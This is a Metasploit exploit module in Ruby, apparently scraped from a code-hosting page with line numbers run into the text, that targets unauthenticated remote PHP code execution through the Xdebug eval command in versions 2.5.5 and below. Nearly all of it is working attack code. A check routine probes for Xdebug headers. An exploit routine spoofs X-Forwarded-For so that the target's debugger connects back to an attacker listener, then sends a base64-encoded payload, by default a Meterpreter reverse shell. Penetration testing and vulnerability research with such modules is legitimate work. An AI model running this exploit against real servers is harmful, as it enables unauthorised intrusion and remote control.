Path: blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb
25353 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::HttpClient10include Rex::Proto::Http1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'xdebug Unauthenticated OS Command Execution',17'Description' => %q{18Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.19This allows the attacker to execute arbitrary php code as the context of the web user.20},21'DisclosureDate' => '2017-09-17',22'Author' => [23'Ricter Zheng', # Discovery https://twitter.com/RicterZ24'Shaksham Jaiswal', # MinatoTW25'Mumbai' # Austin Hudson26],27'References' => [28['CVE', '2015-10141'],29['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],30['URL', 'http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/']31],32'License' => MSF_LICENSE,33'Platform' => 'php',34'Arch' => [ARCH_PHP],35'DefaultTarget' => 0,36'Stance' => Msf::Exploit::Stance::Aggressive,37'DefaultOptions' => {38'PAYLOAD' => 'php/meterpreter/reverse_tcp'39},40'Payload' => {41'DisableNops' => true,42},43'Targets' => [[ 'Automatic', {} ]],44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options([53OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),54OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),55OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),56Opt::RPORT(80),57])58end5960def check61begin62res = send_request_cgi({63'uri' => datastore["PATH"],64'method' => 'GET',65'vars_get' => {66'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)67}68})69vprint_status "Request sent\n#{res}"70if res && res.headers.to_s =~ /XDEBUG/i71vprint_good("Looks like remote server has xdebug enabled\n")72return CheckCode::Detected73else74return CheckCode::Safe75end76rescue Rex::ConnectionError77return CheckCode::Unknown78end79end8081def exploit82payl = Rex::Text.encode_base64("#{payload.encoded}")83cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"84webserver = Thread.new do85begin86server = Rex::Socket::TcpServer.create(87'LocalPort' => datastore['SRVPORT'],88'LocalHost' => datastore['SRVHOST'],89'Context' => {90'Msf' => framework,91'MsfExploit' => self92}93)9495client = server.accept96print_status("Waiting for client response.")97data = client.recv(1024)98print_status("Receiving response")99vprint_line(data)100print_status("Shell might take upto a minute to respond.Please be patient.")101print_status("Sending payload of size #{cmd1.length} bytes")102client.write(cmd1)103client.close104server.close105webserver.exit106ensure107webserver.exit108end109end110send_request_cgi({111'uri' => datastore['PATH'],112'method' => 'GET',113'headers' => {114'X-Forwarded-For' => "#{lhost}",115'Cookie' => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)116}117})118end119end120121122